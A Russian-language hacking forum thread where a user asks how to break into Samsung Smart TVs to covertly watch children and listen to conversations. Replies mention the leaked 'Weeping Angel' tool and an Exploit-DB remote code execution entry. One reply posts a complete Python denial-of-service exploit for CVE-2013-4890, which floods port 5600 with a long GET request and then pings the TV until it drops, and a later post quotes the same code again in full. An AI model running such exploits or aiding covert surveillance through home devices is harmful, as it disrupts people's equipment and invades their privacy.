Действительно ли возможен взлом телевизоров samsung smart tv

thunder

Green Team
08.12.2016
219
26
BIT
0
Возможен ли взлом телевизоров samsung smart tv ( с целью видеонаблюдения за детьми , прослушка разговора ) ? Какие инструменты актуальны для этой цели ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
статья про смарт тв от 15 года, там по ссылкам можно наковырять и за 14-13 год.

 

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher : Статья это хорошо :) Вот только я не увидел никакой конкретики ( гайд взлома , инструменты ).
 

Axon

Green Team
04.01.2017
70
77
BIT
1
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+"[*]"+GREEN+" press ctrl+z to stop"
print BLUE+"[*]"+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+"[*]"+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
 

thunder

Green Team
08.12.2016
219
26
BIT
0
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+""+GREEN+" press ctrl+z to stop"
print BLUE+""+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+""+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+""+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
Спасибо за конкретику . Как фремворк поддерживает данный эксплоит (в какой фремворк его можно засунуть ) ? Там ,что то написано про поддержку windows 7 ..
[doublepost=1489198730][/doublepost]
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
Документы по weeping angel нашёл , а вот само по пока нет. По мимо документов , программы сливались ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Инструменты на паблик еще не скоро попадут. Хотя про сливы оных я не увидел новостей. И просить тут тоже не стоит.
 

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
[ А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?

Там же в шапке кода написано на чем код, соотвественно его надо запускать на этом же. Зачем фрейм, если он так работать может..?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!